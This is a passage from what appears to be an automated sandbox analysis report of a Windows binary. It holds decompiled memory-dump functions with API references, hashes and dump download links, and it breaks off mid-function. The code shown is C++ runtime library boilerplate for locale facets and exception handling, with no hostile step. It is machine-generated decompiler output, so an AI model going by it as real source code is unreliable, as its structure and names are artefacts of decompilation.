                                              • Part of subcall function 00301380: std::_Lockit::_Lockit.LIBCPMT ref: 00301391
                                            • codecvt.LIBCPMT ref: 003088EE
                                            • std::bad_exception::bad_exception.LIBCMT ref: 00308902
                                            • __CxxThrowException@8.LIBCMT ref: 00308910
                                            • std::_Facet_Register.LIBCPMT ref: 00308926
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661491256.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000000.00000002.661474880.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661534395.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661550640.000000000032E000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661572696.000000000032F000.00000040.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661595085.0000000000333000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661629403.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: std::_$LockitLockit::_$Exception@8Facet_H_prolog3RegisterThrow__lockcodecvtstd::bad_exception::bad_exception
                                            • String ID: bad cast
                                            • API String ID: 1512642153-3145022300
                                            • Opcode ID: fc25063d6570cb2574c8e80896bc278539971771033590762338ee2c689a5384
                                            • Instruction ID: 7a196ecc46ef4a0e31ff4c726355fa7bd53efdae4e3b15cbc597a05a71d7cb0b
                                            • Opcode Fuzzy Hash: fc25063d6570cb2574c8e80896bc278539971771033590762338ee2c689a5384
                                            • Instruction Fuzzy Hash: E901AD369022288BCB03FBA4C872AAD7378AF04320F610529F4516B1D2DF749A008791
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00307270, Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 242COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 85%
                                            			E00307270(intOrPtr __edx, intOrPtr* _a4) {
				void* _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				void* _v28;
				signed int _v32;
				char _v36;
				char _v40;
				signed int _v44;
				signed int _v48;
				intOrPtr* _v56;
				intOrPtr _v60;
				intOrPtr* _v64;
				signed int _v68;
				intOrPtr _v76;
				signed int _v88;
				char _v92;
				void* _t81;
				intOrPtr _t88;
				signed int _t90;
				signed int _t95;
				intOrPtr _t97;
				intOrPtr _t98;
				intOrPtr _t99;
				void* _t121;
				signed int _t126;
				signed int _t127;
				char _t128;
				signed int _t129;
				intOrPtr _t132;
				void* _t137;
				signed int _t140;
				intOrPtr _t153;
				signed int _t156;
				intOrPtr* _t157;
				signed int _t158;
				intOrPtr* _t159;
				intOrPtr* _t160;
				intOrPtr _t161;
				signed int _t162;
				void* _t166;
				intOrPtr _t167;
				void* _t171;

				_t153 = __edx;
				E003099F7( &_v16, 0);
				_t156 =  *0x331934; // 0x1
				_t128 =  *0x333a4c; // 0xd174e8
				_v8 = _t128;
				if(_t156 == 0) {
					E003099F7( &_v12, _t156);
					_t171 =  *0x331934 - _t156; // 0x1
					if(_t171 == 0) {
						_t126 =  *0x331924; // 0x1
						_t127 = _t126 + 1;
						 *0x331924 = _t127;
						 *0x331934 = _t127;
					}
					E00309A52( &_v12);
					_t156 =  *0x331934; // 0x1
				}
				_t132 =  *_a4;
				if(_t156 >=  *((intOrPtr*)(_t132 + 0xc))) {
					_t159 = 0;
					__eflags = 0;
					goto L8;
				} else {
					_t159 =  *((intOrPtr*)( *((intOrPtr*)(_t132 + 8)) + _t156 * 4));
					if(_t159 != 0) {
						L16:
						E00309A52( &_v16);
						return _t159;
					} else {
						L8:
						if( *((char*)(_t132 + 0x14)) == 0) {
							L11:
							if(_t159 != 0) {
								goto L16;
							} else {
								goto L12;
							}
						} else {
							_t121 = E0030866D();
							if(_t156 >=  *((intOrPtr*)(_t121 + 0xc))) {
								L12:
								if(_t128 == 0) {
									_t81 = E00301470(_t153,  &_v8, _a4);
									_t167 = _t166 + 8;
									__eflags = _t81 - 0xffffffff;
									if(_t81 == 0xffffffff) {
										E0030D31B( &_v28, "bad cast");
										E0030F4FA( &_v28, 0x32d290);
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_push(0xffffffff);
										_push(E003246A0);
										_push( *[fs:0x0]);
										 *[fs:0x0] = _t167;
										_push(_t128);
										_push(_t159);
										_push(_t156);
										_v60 = _t167 - 0x28;
										_v76 = _t153;
										_t160 = 0x3319c0;
										_v64 = 0x3319c0;
										_t129 = 0;
										_v68 = 0;
										E00303930( &_v92, 0x3319c0);
										__eflags = _v88;
										if(_v88 != 0) {
											_t97 =  *0x3319c0; // 0x3260cc
											_t29 = _t97 + 4; // 0x8
											_t98 =  *_t29;
											_t30 = _t98 + 0x3319e0; // 0x0
											_t161 =  *_t30;
											_t31 = _t98 + 0x3319e4; // 0x0
											_t158 =  *_t31;
											__eflags = _t158;
											if(__eflags > 0) {
												L23:
												_t162 = _t161 - 1;
												asm("sbb edi, ebx");
											} else {
												if(__eflags < 0) {
													L22:
													asm("xorps xmm0, xmm0");
													asm("movlpd [ebp-0x28], xmm0");
													_t158 = _v44;
													_t162 = _v48;
												} else {
													__eflags = _t161 - 1;
													if(_t161 > 1) {
														goto L23;
													} else {
														goto L22;
													}
												}
											}
											_v12 = 0;
											_t99 =  *0x3319c0; // 0x3260cc
											_t35 = _t99 + 4; // 0x8
											_t36 =  *_t35 + 0x3319d4; // 0x201
											__eflags = ( *_t36 & 0x000001c0) - 0x40;
											if(( *_t36 & 0x000001c0) == 0x40) {
												L30:
												__eflags = E00307230( *((intOrPtr*)( *((intOrPtr*)( *_v28 + 4)) + _v28 + 0x38)), _v40) - 0xffffffff;
												_t129 =  ==  ? 4 : _t129;
												_v32 = _t129;
												while(1) {
													__eflags = _t129;
													if(_t129 != 0) {
														goto L36;
													}
													__eflags = _t158;
													if(__eflags >= 0) {
														if(__eflags > 0) {
															L35:
															_v40 =  *((intOrPtr*)( *((intOrPtr*)( *_v28 + 4)) + 0x331a00));
															__eflags = E00307230( *((intOrPtr*)( *((intOrPtr*)( *_v28 + 4)) + 0x3319f8)), _v40) - 0xffffffff;
															_t129 =  ==  ? 4 : _t129;
															_v32 = _t129;
															_t162 = _t162 + 0xffffffff;
															_v48 = _t162;
															asm("adc edi, 0xffffffff");
															_v44 = _t158;
															continue;
														} else {
															__eflags = _t162;
															if(_t162 != 0) {
																goto L35;
															}
														}
													}
													goto L36;
												}
											} else {
												while(1) {
													__eflags = _t129;
													if(_t129 != 0) {
														goto L36;
													}
													__eflags = _t158;
													if(__eflags < 0) {
														goto L30;
													} else {
														if(__eflags > 0) {
															L29:
															_v36 =  *((intOrPtr*)( *((intOrPtr*)( *_v28 + 4)) + 0x331a00));
															__eflags = E00307230( *((intOrPtr*)( *((intOrPtr*)( *_v28 + 4)) + 0x3319f8)), _v36) - 0xffffffff;
															_t129 =  ==  ? 4 : _t129;
															_v32 = _t129;
															_t162 = _t162 + 0xffffffff;
															_v48 = _t162;
															asm("adc edi, 0xffffffff");
															_v44 = _t158;
															continue;
														} else {
															__eflags = _t162;
															if(_t162 == 0) {
																goto L30;
															} else {
																goto L29;
															}
														}
													}
													goto L36;
												}
											}
											L36:
											_v12 = 0xffffffff;
											_t160 = _v28;
										}
										_t88 =  *((intOrPtr*)( *_t160 + 4));
										 *((intOrPtr*)(_t88 + _t160 + 0x20)) = 0;
										 *((intOrPtr*)(_t88 + _t160 + 0x24)) = 0;
										_t137 =  *((intOrPtr*)( *_t160 + 4)) + _t160;
										__eflags = _t129;
										if(__eflags != 0) {
											_t95 =  *(_t137 + 0xc) | _t129;
											__eflags =  *(_t137 + 0x38);
											if( *(_t137 + 0x38) == 0) {
												__eflags = _t95;
											}
											E00301AD0(_t137, _t95, 0);
										}
										_t90 = L00309A76(__eflags);
										_t157 = _v56;
										__eflags = _t90;
										if(_t90 == 0) {
											E003043E0(_t157);
										}
										_t140 =  *( *((intOrPtr*)( *_t157 + 4)) + _t157 + 0x38);
										__eflags = _t140;
										if(_t140 != 0) {
											 *((intOrPtr*)( *_t140 + 8))();
										}
										 *[fs:0x0] = _v20;
										return _t160;
									} else {
										_t159 = _v8;
										 *0x333a4c = _t159;
										 *((intOrPtr*)( *_t159 + 4))();
										E00308645(_t159);
										goto L16;
									}
								} else {
									E00309A52( &_v16);
									return _t128;
								}
							} else {
								_t159 =  *((intOrPtr*)( *((intOrPtr*)(_t121 + 8)) + _t156 * 4));
								goto L11;
							}
						}
					}
				}
			}














































                                            0x00307270
                                            0x0030727e
                                            0x00307283
                                            0x00307289
                                            0x0030728f
                                            0x00307294
                                            0x0030729a
                                            0x0030729f
                                            0x003072a5
                                            0x003072a7
                                            0x003072ac
                                            0x003072ad
                                            0x003072b2
                                            0x003072b2
                                            0x003072ba
                                            0x003072bf
                                            0x003072bf
                                            0x003072c8
                                            0x003072cd
                                            0x003072db
                                            0x003072db
                                            0x00000000
                                            0x003072cf
                                            0x003072d2
                                            0x003072d7
                                            0x0030733b
                                            0x0030733e
                                            0x0030734b
                                            0x003072d9
                                            0x003072dd
                                            0x003072e1
                                            0x003072f3
                                            0x003072f5
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x003072e3
                                            0x003072e3
                                            0x003072eb
                                            0x003072f7
                                            0x003072f9
                                            0x00307315
                                            0x0030731a
                                            0x0030731d
                                            0x00307320
                                            0x00307354
                                            0x00307362
                                            0x00307367
                                            0x00307368
                                            0x00307369
                                            0x0030736a
                                            0x0030736b
                                            0x0030736c
                                            0x0030736d
                                            0x0030736e
                                            0x0030736f
                                            0x00307373
                                            0x00307375
                                            0x00307380
                                            0x00307381
                                            0x0030738b
                                            0x0030738c
                                            0x0030738d
                                            0x0030738e
                                            0x00307391
                                            0x00307394
                                            0x00307399
                                            0x0030739c
                                            0x0030739e
                                            0x003073a5
                                            0x003073aa
                                            0x003073ad
                                            0x003073b3
                                            0x003073b8
                                            0x003073b8
                                            0x003073bb
                                            0x003073bb
                                            0x003073c1
                                            0x003073c1
                                            0x003073c7
                                            0x003073c9
                                            0x003073e2
                                            0x003073e2
                                            0x003073e5
                                            0x003073cb
                                            0x003073cb
                                            0x003073d2
                                            0x003073d2
                                            0x003073d5
                                            0x003073da
                                            0x003073dd
                                            0x003073cd
                                            0x003073cd
                                            0x003073d0
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x003073d0
                                            0x003073cb
                                            0x003073e7
                                            0x003073ee
                                            0x003073f3
                                            0x003073f6
                                            0x00307401
                                            0x00307404
                                            0x00307453
                                            0x00307467
                                            0x0030746f
                                            0x00307472
                                            0x00307475
                                            0x00307475
                                            0x00307477
                                            0x00000000
                                            0x00000000
                                            0x00307479
                                            0x0030747b
                                            0x0030747d
                                            0x00307483
                                            0x00307491
                                            0x003074a2
                                            0x003074aa
                                            0x003074ad
                                            0x003074b0
                                            0x003074b3
                                            0x003074b6
                                            0x003074b9
                                            0x00000000
                                            0x0030747f
                                            0x0030747f
                                            0x00307481
                                            0x00000000
                                            0x00000000
                                            0x00307481
                                            0x0030747d
                                            0x00000000
                                            0x0030747b
                                            0x00000000
                                            0x00307406
                                            0x00307406
                                            0x00307408
                                            0x00000000
                                            0x00000000
                                            0x0030740e
                                            0x00307410
                                            0x00000000
                                            0x00307412
                                            0x00307412
                                            0x00307418
                                            0x00307426
                                            0x00307437
                                            0x0030743f
                                            0x00307442
                                            0x00307445
                                            0x00307448
                                            0x0030744b
                                            0x0030744e
                                            0x00000000
                                            0x00307414
                                            0x00307414
                                            0x00307416
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x00307416
                                            0x00307412
                                            0x00000000
                                            0x00307410
                                            0x00307406
                                            0x003074be
                                            0x003074be
                                            0x003074fa
                                            0x003074fa
                                            0x003074ff
                                            0x00307502
                                            0x0030750a
                                            0x00307517
                                            0x00307519
                                            0x0030751b
                                            0x00307520
                                            0x00307522
                                            0x00307526
                                            0x00307528
                                            0x00307528
                                            0x0030752e
                                            0x0030752e
                                            0x00307533
                                            0x00307538
                                            0x0030753b
                                            0x0030753d
                                            0x00307541
                                            0x00307541
                                            0x0030754b
                                            0x0030754f
                                            0x00307551
                                            0x00307555
                                            0x00307555
                                            0x0030755d
                                            0x0030756a
                                            0x00307322
                                            0x00307322
                                            0x00307327
                                            0x0030732f
                                            0x00307333
                                            0x00000000
                                            0x00307338
                                            0x003072fb
                                            0x00307300
                                            0x0030730d
                                            0x0030730d
                                            0x003072ed
                                            0x003072f0
                                            0x00000000
                                            0x003072f0
                                            0x003072eb
                                            0x003072e1
                                            0x003072d7

                                            APIs
                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0030727E
                                              • Part of subcall function 003099F7: __lock.LIBCMT ref: 00309A08
                                            • std::_Lockit::_Lockit.LIBCPMT ref: 0030729A
                                            • std::_Facet_Register.LIBCPMT ref: 00307333
                                            • std::bad_exception::bad_exception.LIBCMT ref: 00307354
                                              • Part of subcall function 0030D31B: std::exception::exception.LIBCMT ref: 0030D325
                                            • __CxxThrowException@8.LIBCMT ref: 00307362
                                              • Part of subcall function 0030F4FA: RaiseException.KERNEL32(?,?,?,00301B23,00000050,00000050,?,?,?,?,?,00301B23,00000000,00000000), ref: 0030F54F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661491256.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000000.00000002.661474880.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661534395.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661550640.000000000032E000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661572696.000000000032F000.00000040.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661595085.0000000000333000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661629403.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: std::_$LockitLockit::_$ExceptionException@8Facet_RaiseRegisterThrow__lockstd::bad_exception::bad_exceptionstd::exception::exception
                                            • String ID: Ha2$bad cast
                                            • API String ID: 3247575091-2980850438
                                            • Opcode ID: 0ffbf8b36293d82ad8b5ff8dc2f7eb5e9be5d6b9ed4ae0c3cf34a8360f9d7f5c
                                            • Instruction ID: a8c0a4bad6e997c8e2ef14f9ac564409651badf9cbb70ac5ccfde66041c67daa
                                            • Opcode Fuzzy Hash: 0ffbf8b36293d82ad8b5ff8dc2f7eb5e9be5d6b9ed4ae0c3cf34a8360f9d7f5c
                                            • Instruction Fuzzy Hash: 57919075E062148FCB12DF98C9A0BADBBB5EF49320F254299E815AB3D1D731AD01CBD0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00301AD0, Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 61COMMON
                                            Download Yara Rule
                                            APIs
                                            • __CxxThrowException@8.LIBCMT ref: 00301B1E
                                            • __CxxThrowException@8.LIBCMT ref: 00301B3B
                                            • __CxxThrowException@8.LIBCMT ref: 00301B54
                                            • __CxxThrowException@8.LIBCMT ref: 00301B6D
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661491256.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000000.00000002.661474880.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661534395.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661550640.000000000032E000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661572696.000000000032F000.00000040.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661595085.0000000000333000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661629403.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Exception@8Throw
                                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                            • API String ID: 2005118841-1866435925
                                            • Opcode ID: 152b771f20ab46d03f78a3f394bae7cbc302dc9f6889e5d1ae1e217c51fcaed9
                                            • Instruction ID: 18883178a696f903eb9789b76438e129efb987baf87c4abbbe015e50a4bb31c8
                                            • Opcode Fuzzy Hash: 152b771f20ab46d03f78a3f394bae7cbc302dc9f6889e5d1ae1e217c51fcaed9
                                            • Instruction Fuzzy Hash: E8014530206305ABD712EF64C833FEAB3D8AB80740F008C1CF99AAA4C1EB74E4088756
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00311300, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 103COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 75%
                                            			E00311300(void* __ecx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				char _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t44;
				void* _t45;
				signed int _t49;
				intOrPtr _t54;
				intOrPtr _t58;
				void* _t60;
				intOrPtr _t61;
				intOrPtr* _t64;
				intOrPtr _t70;
				signed int* _t73;
				void* _t75;
				void* _t76;

				_t57 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t64 = _a4;
				_t77 =  *_t64 - 0x80000003;
				if( *_t64 == 0x80000003) {
					L19:
					return _t44;
				}
				_t45 = E00315E81(_t60, _t64, _t77);
				_t54 = _a20;
				_t78 =  *((intOrPtr*)(_t45 + 0x80));
				if( *((intOrPtr*)(_t45 + 0x80)) == 0) {
					L6:
					if( *((intOrPtr*)(_t54 + 0xc)) == 0) {
						E003168A0();
					}
					_t44 = E0030F82D(_t57, _t54, _a28, _a24,  &_v12,  &_v8);
					_t58 = _v12;
					_t76 = _t75 + 0x14;
					_t61 = _v8;
					if(_t58 >= _t61) {
						L18:
						goto L19;
					} else {
						_t17 = _t44 + 0xc; // 0xc
						_t73 = _t17;
						_t44 = _a24;
						do {
							if(_t44 >=  *((intOrPtr*)(_t73 - 0xc)) && _t44 <=  *((intOrPtr*)(_t73 - 8))) {
								_t49 =  *_t73 << 4;
								if( *((intOrPtr*)(_t73[1] + _t49 - 0xc)) == 0) {
									L14:
									_t50 = _t49 + _t73[1] + 0xfffffff0;
									_t70 = _a4;
									if(( *(_t49 + _t73[1] + 0xfffffff0) & 0x00000040) == 0) {
										_push(1);
										_t35 = _t73 - 0xc; // 0x0
										E00310E9B(_t54, _t73, _t70, _a8, _a12, _a16, _t54, _t50, 0, _t35, _a28, _a32);
										_t61 = _v8;
										_t76 = _t76 + 0x2c;
										_t58 = _v12;
									}
									L16:
									_t44 = _a24;
									goto L17;
								}
								_t61 = _v8;
								_t54 = _a20;
								if( *((char*)( *((intOrPtr*)(_t73[1] + _t49 - 0xc)) + 8)) != 0) {
									goto L16;
								}
								goto L14;
							}
							L17:
							_t58 = _t58 + 1;
							_t73 =  &(_t73[5]);
							_v12 = _t58;
						} while (_t58 < _t61);
						goto L18;
					}
				}
				__imp__EncodePointer(0);
				if( *((intOrPtr*)(E00315E81(_t60, _t64, _t78) + 0x80)) != _t45 &&  *_t64 != 0xe0434f4d &&  *_t64 != 0xe0434352) {
					_t44 = E0030F756(_t64, _a8, _a12, _a16, _t54, _a28, _a32);
					_t75 = _t75 + 0x1c;
					if(_t44 != 0) {
						goto L18;
					}
				}
			}




















                                            0x00311300
                                            0x00311303
                                            0x00311304
                                            0x00311306
                                            0x00311309
                                            0x0031130f
                                            0x00311417
                                            0x0031141b
                                            0x0031141b
                                            0x00311317
                                            0x0031131c
                                            0x0031131f
                                            0x00311326
                                            0x00311370
                                            0x00311374
                                            0x00311376
                                            0x00311376
                                            0x0031138a
                                            0x0031138f
                                            0x00311392
                                            0x00311395
                                            0x0031139a
                                            0x00311415
                                            0x00000000
                                            0x0031139c
                                            0x0031139c
                                            0x0031139c
                                            0x0031139f
                                            0x003113a2
                                            0x003113a5
                                            0x003113b1
                                            0x003113ba
                                            0x003113cf
                                            0x003113d5
                                            0x003113d7
                                            0x003113dd
                                            0x003113df
                                            0x003113e4
                                            0x003113f9
                                            0x003113fe
                                            0x00311401
                                            0x00311404
                                            0x00311404
                                            0x00311407
                                            0x00311407
                                            0x00000000
                                            0x00311407
                                            0x003113c3
                                            0x003113ca
                                            0x003113cd
                                            0x00000000
                                            0x00000000
                                            0x00000000
                                            0x003113cd
                                            0x0031140a
                                            0x0031140a
                                            0x0031140b
                                            0x0031140e
                                            0x00311411
                                            0x00000000
                                            0x003113a2
                                            0x0031139a
                                            0x0031132a
                                            0x0031133d
                                            0x00311360
                                            0x00311365
                                            0x0031136a
                                            0x00000000
                                            0x00000000
                                            0x0031136a

                                            APIs
                                              • Part of subcall function 00315E81: __getptd_noexit.LIBCMT ref: 00315E82
                                            • EncodePointer.KERNEL32(00000000), ref: 0031132A
                                            • _CallSETranslator.LIBCMT ref: 00311360
                                            • _GetRangeOfTrysToCheck.LIBCMT ref: 0031138A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.661491256.0000000000301000.00000020.00020000.sdmp, Offset: 00300000, based on PE: true
                                            • Associated: 00000000.00000002.661474880.0000000000300000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661534395.0000000000325000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661550640.000000000032E000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661572696.000000000032F000.00000040.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661595085.0000000000333000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.661629403.0000000000335000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CallCheckEncodePointerRangeTranslatorTrys__getptd_noexit
                                            • String ID: MOC$RCC$eK
                                            • API String ID: 3337196757-894808068
                                            • Opcode ID: d35e6503f393a2db09363e37f560616f3dcb43ddc7b4cae3694cc0ba0c65e437
                                            • Instruction ID: 8c450f798455e31531e7368ceebd3fae0dbc30968e1d8a877666d1c0b93863e8
                                            • Opcode Fuzzy Hash: d35e6503f393a2db09363e37f560616f3dcb43ddc7b4cae3694cc0ba0c65e437
                                            • Instruction Fuzzy Hash: BE41A936500109EFDF1ACF45C881AEAB77AEF48714F2A8558FA145B251C735ED91CBA0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00307980, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 97COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 89%
                                            			E00307980(intOrPtr* _a4) {
				intOrPtr* _v0;
				signed int* _v4;
				signed int* _v8;
				signed int _v12;
				signed int _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				signed int _v48;
				char _v56;
				signed int _v88;
				char _v96;
				intOrPtr* _v104;
				signed int _v108;
				intOrPtr _v128;
				signed int _v132;
				char _v148;
				intOrPtr* _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				void* _v169;
				signed int _v172;
				void* _t172;
				void* _t180;
				void* _t188;
				signed int _t196;
				void* _t198;
				intOrPtr* _t199;
				signed int _t200;
				signed int _t203;
				signed int _t204;
				signed int _t207;
				signed int _t208;
				signed int _t213;
				signed int _t217;
				signed int _t221;
				signed int _t226;
				signed int _t230;
				signed int _t234;
				signed int _t239;
				void* _t244;
				signed int _t249;
				signed int _t250;
				void* _t255;
				signed int _t260;
				signed int _t261;
				void* _t266;
				signed int _t271;
				signed int _t272;
				signed int* _t273;
				signed int _t274;
				signed int _t275;
				signed int _t276;
				signed int* _t277;
				intOrPtr _t278;
				intOrPtr _t281;
				intOrPtr _t286;
				signed int _t291;
				intOrPtr* _t294;
				signed int _t296;
				intOrPtr* _t297;
				signed int _t300;
				signed int _t301;
				signed int _t302;
				signed int _t303;
				signed int _t306;
				signed int _t307;
				intOrPtr _t308;
				void* _t321;
				signed int _t322;
				signed int _t323;
				signed int* _t326;
				signed char* _t327;
				signed int _t328;
				signed int _t329;
				signed int _t332;
				signed int _t333;
				signed int _t334;
				signed int _t338;
				signed int _t339;
				signed int _t340;
				signed int* _t341;
				signed int* _t342;
				signed int _t343;
				signed int _t344;
				void* _t345;
				void* _t350;
				void* _t351;
				void* _t353;
				void* _t354;
				void* _t355;
				void* _t356;
				void* _t366;

				E003099F7( &_v16, 0);
				_t338 =  *0x333a5c; // 0x0
				_t273 =  *0x333a54; // 0x0
				_v8 = _t273;
				if(_t338 == 0) {
					E003099F7( &_v12, _t338);
					_t366 =  *0x333a5c - _t338; // 0x0
					if(_t366 == 0) {
						_t271 =  *0x331924; // 0x1
						_t272 = _t271 + 1;
						 *0x331924 = _t272;
						 *0x333a5c = _t272;
					}
					E00309A52( &_v12);
					_t338 =  *0x333a5c; // 0x0
				}
				_t281 =  *_a4;
				if(_t338 >=  *((intOrPtr*)(_t281 + 0xc))) {
					_t342 = 0;
					__eflags = 0;
					goto L8;
				} else {
					_t342 =  *( *((intOrPtr*)(_t281 + 8)) + _t338 * 4);
					if(_t342 != 0) {
						L16:
						E00309A52( &_v16);
						return _t342;
					} else {
						L8:
						if( *((char*)(_t281 + 0x14)) == 0) {
							L11:
							if(_t342 != 0) {
								goto L16;
							} else {
								goto L12;
							}
						} else {
							_t266 = E0030866D();
							if(_t338 >=  *((intOrPtr*)(_t266 + 0xc))) {
								L12:
								if(_t273 == 0) {
									_t172 = E00307FD0(_t321,  &_v8, _a4);
									_t354 = _t353 + 8;
									__eflags = _t172 - 0xffffffff;
									if(_t172 == 0xffffffff) {
										E0030D31B( &_v28, "bad cast");
										E0030F4FA( &_v28, 0x32d290);
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_t350 = _t354;
										_t355 = _t354 - 0x18;
										_push(_t273);
										_push(_t342);
										_push(_t338);
										E003099F7( &_v56, 0);
										_t339 =  *0x333a64; // 0x0
										_t274 =  *0x333a58; // 0x0
										_v48 = _t274;
										__eflags = _t339;
										if(_t339 == 0) {
											E003099F7( &_v16, _t339);
											__eflags =  *0x333a64 - _t339; // 0x0
											if(__eflags == 0) {
												_t260 =  *0x331924; // 0x1
												_t261 = _t260 + 1;
												__eflags = _t261;
												 *0x331924 = _t261;
												 *0x333a64 = _t261;
											}
											E00309A52( &_v16);
											_t339 =  *0x333a64; // 0x0
										}
										_t286 =  *_v0;
										__eflags = _t339 -  *((intOrPtr*)(_t286 + 0xc));
										if(_t339 >=  *((intOrPtr*)(_t286 + 0xc))) {
											_t343 = 0;
											__eflags = 0;
											goto L26;
										} else {
											_t343 =  *( *((intOrPtr*)(_t286 + 8)) + _t339 * 4);
											__eflags = _t343;
											if(_t343 != 0) {
												L34:
												E00309A52( &_v20);
												return _t343;
											} else {
												L26:
												__eflags =  *((char*)(_t286 + 0x14));
												if( *((char*)(_t286 + 0x14)) == 0) {
													L29:
													__eflags = _t343;
													if(_t343 != 0) {
														goto L34;
													} else {
														goto L30;
													}
												} else {
													_t255 = E0030866D();
													__eflags = _t339 -  *((intOrPtr*)(_t255 + 0xc));
													if(_t339 >=  *((intOrPtr*)(_t255 + 0xc))) {
														L30:
														__eflags = _t274;
														if(_t274 == 0) {
															_t180 = E003080F0(_t321,  &_v12, _v0);
															_t356 = _t355 + 8;
															__eflags = _t180 - 0xffffffff;
															if(_t180 == 0xffffffff) {
																E0030D31B( &_v32, "bad cast");
																E0030F4FA( &_v32, 0x32d290);
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																asm("int3");
																_push(_t350);
																_t351 = _t356;
																_push(_t274);
																_push(_t343);
																_push(_t339);
																E003099F7( &_v96, 0);
																_t340 =  *0x333a60; // 0x0
																_t275 =  *0x333a50; // 0x0
																_v88 = _t275;
																__eflags = _t340;
																if(_t340 == 0) {
																	E003099F7( &_v20, _t340);
																	__eflags =  *0x333a60 - _t340; // 0x0
																	if(__eflags == 0) {
																		_t249 =  *0x331924; // 0x1
																		_t250 = _t249 + 1;
																		__eflags = _t250;
																		 *0x331924 = _t250;
																		 *0x333a60 = _t250;
																	}
																	E00309A52( &_v20);
																	_t340 =  *0x333a60; // 0x0
																}
																_t291 =  *_v4;
																__eflags = _t340 -  *((intOrPtr*)(_t291 + 0xc));
																if(_t340 >=  *((intOrPtr*)(_t291 + 0xc))) {
																	_t344 = 0;
																	__eflags = 0;
																	goto L44;
																} else {
																	_t344 =  *( *((intOrPtr*)(_t291 + 8)) + _t340 * 4);
																	__eflags = _t344;
																	if(_t344 != 0) {
																		L52:
																		E00309A52( &_v24);
																		return _t344;
																	} else {
																		L44:
																		__eflags =  *((char*)(_t291 + 0x14));
																		if( *((char*)(_t291 + 0x14)) == 0) {
																			L47:
																			__eflags = _t344;
																			if(_t344 != 0) {
																				goto L52;
																			} else {
																				goto L48;
																			}
																		} else {
																			_t244 = E0030866D();
																			__eflags = _t340 -  *((intOrPtr*)(_t244 + 0xc));
																			if(_t340 >=  *((intOrPtr*)(_t244 + 0xc))) {
																				L48:
																				__eflags = _t275;
																				if(_t275 == 0) {
																					_t188 = E00308170(_t321,  &_v16, _v4);
																					__eflags = _t188 - 0xffffffff;
																					if(_t188 == 0xffffffff) {
																						E0030D31B( &_v36, "bad cast");
																						E0030F4FA( &_v36, 0x32d290);
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						asm("int3");
																						_push(_t351);
																						_t294 = _v104;
																						_t322 =  *_t294;
																						_push(_t275);
																						_t276 = _v108;
																						_push(_t344);
																						_push(_t340);
